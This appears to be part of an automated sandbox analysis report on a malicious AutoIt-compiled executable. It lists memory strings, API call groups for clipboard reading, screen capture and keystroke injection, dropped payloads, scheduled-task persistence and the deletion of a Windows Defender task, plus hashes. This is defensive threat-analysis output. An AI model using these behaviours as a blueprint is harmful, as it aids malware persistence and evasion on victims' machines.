Source: chrome.exe, 0000002D.00000002.1788213185.00005B04011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043E260 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 24_2_0043E260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043E7BD GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 24_2_0043E7BD
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00E4AA57
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E79576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00E79576
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

System Summary

Source: Af3hqfTjFh.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Af3hqfTjFh.exe, 00000000.00000002.872746384.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bb46327d-9
Source: Af3hqfTjFh.exe, 00000000.00000002.872746384.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1f1023b3-8
Source: Af3hqfTjFh.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5d84e915-4
Source: Af3hqfTjFh.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_fce6621e-2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe File created: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta Jump to behavior
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .idata
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: .idata
Source: rapes.exe.10.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: .idata
Source: random[1].exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: .idata
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: .idata
Source: random[1].exe1.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: .idata
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .idata
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .idata
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Jump to dropped file
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00E4D5EB
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E41201
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00E4E8F6
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Windows\Tasks\rapes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File created: C:\Windows\Tasks\futors.job
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0042BD20 24_2_0042BD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00402D30 24_2_00402D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040BD30 24_2_0040BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00430D8F 24_2_00430D8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00408E10 24_2_00408E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00424E13 24_2_00424E13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00441E2B 24_2_00441E2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040DE38 24_2_0040DE38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00410EC6 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00416EB0 24_2_00416EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00401F60 24_2_00401F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043DFD0 24_2_0043DFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00431FF3 24_2_00431FF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00403FB2 24_2_00403FB2
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387A61C0 25_2_00007FF7387A61C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878F1E4 25_2_00007FF73878F1E4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387821F0 25_2_00007FF7387821F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73874EA00 25_2_00007FF73874EA00
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F5A10 25_2_00007FF7386F5A10
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E49F0 25_2_00007FF7386E49F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F89F0 25_2_00007FF7386F89F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73876A140 25_2_00007FF73876A140
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738735150 25_2_00007FF738735150
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386D19A0 25_2_00007FF7386D19A0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386EF280 25_2_00007FF7386EF280
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871BAF0 25_2_00007FF73871BAF0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738760B00 25_2_00007FF738760B00
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FEA20 25_2_00007FF7386FEA20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879BA20 25_2_00007FF73879BA20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E0310 25_2_00007FF7386E0310
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738766A30 25_2_00007FF738766A30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878424A 25_2_00007FF73878424A
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387032E0 25_2_00007FF7387032E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721A50 25_2_00007FF738721A50
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DB2D0 25_2_00007FF7386DB2D0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CA6C 25_2_00007FF73878CA6C
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738751270 25_2_00007FF738751270
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73875CA90 25_2_00007FF73875CA90
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E5B70 25_2_00007FF7386E5B70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387613F0 25_2_00007FF7387613F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878BB20 25_2_00007FF73878BB20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73872A320 25_2_00007FF73872A320
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738728330 25_2_00007FF738728330
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879B340 25_2_00007FF73879B340
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E344 25_2_00007FF73878E344
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738773CD0 25_2_00007FF738773CD0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871B4E0 25_2_00007FF73871B4E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73872BCE0 25_2_00007FF73872BCE0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721D10 25_2_00007FF738721D10
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879C508 25_2_00007FF73879C508
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73877D420 25_2_00007FF73877D420
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878D450 25_2_00007FF73878D450
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CC70 25_2_00007FF73878CC70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738784C70 25_2_00007FF738784C70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738707CB0 25_2_00007FF738707CB0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 25_2_00007FF73879F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738790DA4 25_2_00007FF738790DA4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DDD80 25_2_00007FF7386DDD80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878A534 25_2_00007FF73878A534
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738793550 25_2_00007FF738793550
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E548 25_2_00007FF73878E548
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878B570 25_2_00007FF73878B570
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B7E80 25_2_00007FF7386B7E80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CEB4 25_2_00007FF73878CEB4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738784EB0 25_2_00007FF738784EB0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E8670 25_2_00007FF7386E8670
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386D9640 25_2_00007FF7386D9640
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F5620 25_2_00007FF7386F5620
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738731710 25_2_00007FF738731710
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879B628 25_2_00007FF73879B628
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73873AE30 25_2_00007FF73873AE30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387A2E48 25_2_00007FF7387A2E48
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387006D0 25_2_00007FF7387006D0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73876A660 25_2_00007FF73876A660
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386BF6C0 25_2_00007FF7386BF6C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73875D670 25_2_00007FF73875D670
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738799694 25_2_00007FF738799694
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73877CE90 25_2_00007FF73877CE90
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B8780 25_2_00007FF7386B8780
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387777B0 25_2_00007FF7387777B0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387297C0 25_2_00007FF7387297C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FD740 25_2_00007FF7386FD740
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E8F40 25_2_00007FF7386E8F40
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73873FF20 25_2_00007FF73873FF20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B1000 25_2_00007FF7386B1000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738768F30 25_2_00007FF738768F30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721F40 25_2_00007FF738721F40
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E74C 25_2_00007FF73878E74C
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386CEFD0 25_2_00007FF7386CEFD0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871D770 25_2_00007FF73871D770
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738703FA0 25_2_00007FF738703FA0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73874D790 25_2_00007FF73874D790
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DA890 25_2_00007FF7386DA890
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387940C0 25_2_00007FF7387940C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FE070 25_2_00007FF7386FE070
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387528C0 25_2_00007FF7387528C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738747840 25_2_00007FF738747840
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FD0E0 25_2_00007FF7386FD0E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738720850 25_2_00007FF738720850
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878C868 25_2_00007FF73878C868
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738735870 25_2_00007FF738735870
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe 2D29A4D1EF26E685872D495BB5B38D098740F9547E3AFD4862029A7D529EB08B
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe 28D15F133C8EA7BF4C985207EEFDC4C8C324FF2552DF730F8861FCC041BC3E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0041A4F0 appears 100 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040AC40 appears 78 times
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: String function: 00DE9CB3 appears 31 times
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: String function: 00E00A30 appears 41 times
Source: random[1].exe.21.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: 466f8e521c.exe.21.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: random[1].exe1.21.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: 466a80d633.exe.21.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: f4d01cf3f8.exe.43.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: 01ea7855d3.exe.43.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: Af3hqfTjFh.exe, 00000000.00000003.871827209.0000000001781000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.871897759.0000000001782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867250565.00000000018BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867250565.00000000018BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.872557082.0000000001784000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000002.873366680.0000000001788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.870336624.0000000001774000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867212588.00000000018A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867212588.00000000018A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867233382.00000000018B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867233382.00000000018B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.872281198.00000000018C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: Af3hqfTjFh.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
